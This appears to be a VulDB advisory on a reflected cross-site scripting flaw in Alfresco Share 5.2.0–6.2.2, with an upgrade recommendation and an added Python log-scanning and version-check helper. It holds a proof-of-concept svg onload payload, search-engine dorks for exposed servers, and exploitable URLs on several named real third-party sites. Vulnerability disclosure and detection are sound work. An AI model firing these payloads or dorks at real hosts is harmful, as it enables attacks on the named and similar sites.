| Field | Value |
|---|---|
| Title | Alfresco Software Alfresco Community/Enterprise 5.2.0 to 6.2.2 Cross-Site Scripting |
| Description | Reflected Cross-Site Scripting (XSS) in Alfresco Community/Enterprise |

A Reflected Cross-Site Scripting (XSS) vulnerability was identified in Alfresco Community/Enterprise versions between 5.2.0 and 6.2.2. This flaw allows an attacker to execute arbitrary scripts within the victim's browser context, compromising the integrity and confidentiality of data.
Affected Components:
Alfresco Share (/share/s/ endpoint)
Vulnerable Versions:
Alfresco Community/Enterprise versions from 5.2.0 to 6.2.2.
Technical Note:
Versions above 6.2.2 are not affected by this vulnerability. However, a large number of Alfresco systems exposed on the internet today remain vulnerable.
Technical Details
The vulnerability can be exploited by injecting markup into the unsanitized path segment of the /share/s/ endpoint, which is reflected into the response without escaping. When a user opens the crafted URL, the embedded JavaScript executes in that user's browser.
Exploitation Payload:
{{Host}}/share/s/%27%22><svg onload=alert(1)>
Real-World Example:
https://x.x.x.x/share/s/%27%22%3E%3Csvg%20onload=alert(1)%3E
Version Detection Endpoint
The Alfresco version can be identified by accessing the following endpoint:
{{Host}}/alfresco/service/api/server
Examples:
https://x.x.x.x/alfresco/service/api/server -> Version 6.2.2
http://x.x.x.x:8090/alfresco/service/api/server -> Version 5.2.0
Tested Versions and Exploitable URLs
Version 6.2.2
https://x.x.x.x/share/s/%27%22><svg onload=alert(1)>
Version 6.1.2
https://cloud.caf13.fr/share/s/%27%22><svg onload=alert(1)>
https://members.im2pact.org/share/s/%27%22><svg onload=alert(1)>
https://forge.citl.mun.ca/share/s/%27%22><svg onload=alert(1)>
Version 6.0.7
http://calas.lat/share/s/%27%22><svg onload=alert(1)>
Version 5.2.7
https://x.x.x.x/share/s/%27%22><svg onload=alert(1)>
Version 5.2.0
http://x.x.x.x:8090/share/s/%27%22><svg onload=alert(1)>
Mitigation
To mitigate this vulnerability:
Upgrade to a version later than 6.2.2; those releases are not affected by this issue.
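As an added example (not part of this submission or of Alfresco's own code), a Python helper that covers the two checks a defender takes from the details above: whether a version string such as the one returned by /alfresco/service/api/server falls inside the 5.2.0 to 6.2.2 range, and whether /share/s/ requests in a web-server access log carry markup-like input after URL decoding, as the advisory's payload does. The log lines and the version string are constructed samples; only the version string is parsed, not the endpoint's JSON envelope.

```python
import re
from urllib.parse import unquote

# Affected range stated in the advisory: 5.2.0 <= version <= 6.2.2 (inclusive).
AFFECTED_MIN, AFFECTED_MAX = (5, 2, 0), (6, 2, 2)

def parse_version(text):
    """Extract the leading x.y.z from a version string such as '6.2.2 (r...)'."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(p) for p in m.groups())

def is_affected_version(text):
    """True when the reported version lies inside the advisory's affected range."""
    return AFFECTED_MIN <= parse_version(text) <= AFFECTED_MAX

# The advisory's payload decodes to  '"><svg onload=alert(1)>  ; none of these
# characters (or an on*= handler) belongs in a /share/s/ short-URL segment.
_SUSPICIOUS = re.compile(r"""[<>"']|\bon\w+\s*=""", re.IGNORECASE)
_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_share_s_requests(log_lines):
    """Return (line_no, decoded_path) for /share/s/ requests carrying markup-like input."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = _REQUEST.search(line)
        if not m or not m.group(1).startswith("/share/s/"):
            continue
        decoded = m.group(1)
        for _ in range(3):            # decode repeatedly so %253C -> %3C -> < is caught
            nxt = unquote(decoded)
            if nxt == decoded:
                break
            decoded = nxt
        if _SUSPICIOUS.search(decoded[len("/share/s/"):]):
            hits.append((no, decoded))
    return hits

# Constructed sample access-log lines (not real traffic); line 2 carries the advisory's payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jan/2025:15:28:01 +0000] "GET /share/s/abc123 HTTP/1.1" 200 512',
    '10.0.0.9 - - [03/Jan/2025:15:28:02 +0000] "GET /share/s/%27%22%3E%3Csvg%20onload=alert(1)%3E HTTP/1.1" 200 2048',
    '10.0.0.9 - - [03/Jan/2025:15:28:03 +0000] "GET /share/page/site/x/dashboard HTTP/1.1" 200 9000',
]
```

Running `flag_share_s_requests(SAMPLE_LOG)` reports only line 2; a hit on a version that `is_affected_version` also accepts is the combination worth alerting on.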
Dorks
Google Dork:
intitle:"Alfresco » Login"
Shodan Dork:
https://www.shodan.io/search?query=http.favicon.hash%3A1333537166

| Field | Value |
|---|---|
| Source | ⚠️ https://docs.alfresco.com/support/latest/policies/security/ |
| User | erickfernandox (UID 57733) |
| Submission | 03/01/2025 15:28 (1 year ago) |
| Moderation | 17/01/2025 21:37 (14 days later) |
| Status | Accepted |
| VulDB Entry | 292491 [Hyland Alfresco Community Edition up to 6.2.2 URL /share/s/ cross site scripting] |
| Points | 20 |